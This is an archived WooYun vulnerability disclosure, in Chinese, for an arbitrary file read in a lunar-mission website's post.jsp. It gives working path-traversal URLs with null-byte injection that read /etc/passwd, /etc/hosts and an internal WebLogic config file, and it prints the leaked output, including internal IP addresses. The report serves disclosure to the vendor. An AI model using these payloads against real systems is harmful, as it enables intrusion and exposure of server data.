乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-15: 细节已通知厂商并且等待厂商处理中 2014-09-20: 厂商已经确认,细节仅向厂商公开 2014-09-30: 细节向核心白帽子及相关领域专家公开 2014-10-10: 细节向普通白帽子公开 2014-10-20: 细节向实习白帽子公开 2014-10-30: 细节向公众公开
听说可爱的月兔又坚强地挺过来了,赶紧提交一下这个任意文件读取漏洞。 上次一提交完,正好网站关站了,现在又打开了,再次提交。
提交
http://moon.bao.ac.cn/mission/post.jsp?cata=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00ce3topic&url=post002
返回
root:!:0:0::/:/usr/bin/ksh daemon:!:1:1::/etc: bin:!:2:2::/bin: sys:!:3:3::/usr/sys: adm:!:4:4::/var/adm: uucp:!:5:5::/usr/lib/uucp: guest:!:100:100::/home/guest: nobody:!:4294967294:4294967294::/: lpd:!:9:4294967294::/: lp:*:11:11::/var/spool/lp:/bin/false invscout:*:6:12::/var/adm/invscout:/usr/bin/ksh snapp:*:200:13:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd ipsec:*:201:1::/etc/ipsec:/usr/bin/ksh nuucp:*:7:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico pconsole:*:8:0::/var/adm/pconsole:/usr/bin/ksh ……
http://moon.bao.ac.cn/mission/post.jsp?cata=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fhosts%00ce3topic&url=post002
# Internet Address Hostname # Comments # 192.9.200.1 net0sample # ethernet name/address # 128.100.0.1 token0sample # token ring name/address # 10.2.0.2 x25sample # x.25 name/address # 2000:1:1:1:209:6bff:feee:2b7f ipv6sample # ipv6 name/address 127.0.0.1 loopback localhost # loopback (lo0) name/address 192.168.11.105 web1_boot1 web1 ……
因为返回错误信息暴露了网站的物理地址,可轻松作进一步信息收集。提交
http://moon.bao.ac.cn/mission/post.jsp?cata=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fbea/weblogic/user_projects/domains/base_domain/servers/ManagedServer_1/stage/moonweb/moonweb/_include/config.jsp%00ce3topic&url=post002
<p>//以下是需要更改配置的项</p><p>//=======================================================</p><p>//String flvBaseUrl = "./multimedia/shipin.jsp"; // 所网本地</p><p>//String flvBaseUrl = "http://10.20.1.145:8088/regcenter/shipin.jsp"; //天文台内网仿真</p ……
收集完信息后,该做嘛做嘛去。
赶紧修复
危害等级:中
漏洞Rank:10
确认时间:2014-09-20 08:57
暂无